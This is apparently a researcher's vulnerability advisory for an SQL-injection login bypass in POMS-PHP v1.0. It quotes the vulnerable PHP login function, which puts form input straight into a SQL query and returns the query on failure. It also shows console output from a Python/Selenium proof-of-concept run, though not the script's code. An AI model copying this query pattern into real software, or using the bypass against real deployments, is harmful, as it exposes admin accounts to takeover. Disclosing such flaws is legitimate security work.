CVE-nu11-09
Vendor
Vulnerability Description:
The POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account in app /purchase_order/classes/Login.php. remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server, he can bypass the login credentials and take control of the admin account.
Vulnerability PHP code:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
$this->settings->set_userdata('login_type',1);
return json_encode(array('status'=>'success'));
}else{
return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
}
}Responding from the hacked target:
-
-
PoC + checks=PoC-CVE-nu11-09-rfth.py
-
C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>python PoC-CVE-nu11-09.py
DevTools listening on ws://127.0.0.1:63704/devtools/browser/bf18be59-2361-4c08-82dc-689957d5bf9e
The payload for CVE-nu11-09 is deployed and your admin account is PWNED by SQL - Injection
Please see the screenshot poc.png to see if your exploit is working =) BR @nu11secur1ty
This target gives a positive <Response [200]> from inside, after bypassing the login :D
C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>Exploit technique:
Python + Selenium + hidden login && screenshot
Proof:
BR
-
-
- @nu11secur1ty
-